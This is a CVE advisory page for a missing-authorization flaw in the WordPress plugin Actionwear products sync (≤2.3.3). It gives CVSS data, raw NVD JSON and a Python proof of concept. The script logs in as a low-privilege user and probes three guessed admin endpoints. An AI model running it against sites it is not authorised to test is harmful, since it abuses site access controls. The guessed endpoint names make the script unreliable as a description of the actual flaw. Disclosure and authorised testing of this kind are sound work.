Security Vulnerability Report
中文
CVE-2025-49350 CVSS 4.3 MEDIUM

CVE-2025-49350

Published: 2025-12-09 16:17:59
Last Modified: 2026-04-27 20:16:11

Description

Missing Authorization vulnerability in marcoingraiti Actionwear products sync actionwear-products-sync allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Actionwear products sync: from n/a through <= 2.3.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Actionwear Products Sync Plugin <= 2.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-49350 PoC - WordPress Actionwear Products Sync Broken Access Control # Affected: actionwear-products-sync plugin <= 2.3.3 # Type: Missing Authorization in sync action import requests import sys TARGET_URL = input("Enter target WordPress URL: ") USERNAME = input("Enter low-privilege username: ") PASSWORD = input("Enter password: ") # Step 1: Authenticate with low-privilege account session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': TARGET_URL } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Authentication failed") sys.exit(1) print("[+] Successfully authenticated with low-privilege account") # Step 2: Exploit Broken Access Control - Access admin-only sync function # The vulnerable endpoint doesn't verify proper authorization vulnerable_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php?action=actionwear_sync_products", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=sync_actionwear_products", f"{TARGET_URL}/wp-admin/admin.php?page=actionwear-products-sync&action=sync" ] for endpoint in vulnerable_endpoints: try: response = session.get(endpoint, timeout=10) if response.status_code == 200: print(f"[+] Vulnerable endpoint accessible: {endpoint}") print(f"[+] Response preview: {response.text[:500]}") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("\n[!] Note: Successful exploitation indicates Missing Authorization vulnerability") print("[!] Patchstack reference: https://patchstack.com/database/Wordpress/Plugin/actionwear-products-sync/vulnerability/wordpress-actionwear-products-sync-plugin-2-3-3-broken-access-control-vulnerability")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49350", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:58.530", "lastModified": "2026-04-27T20:16:11.217", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in marcoingraiti Actionwear products sync actionwear-products-sync allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Actionwear products sync: from n/a through <= 2.3.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/actionwear-products-sync/vulnerability/wordpress-actionwear-products-sync-plugin-2-3-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}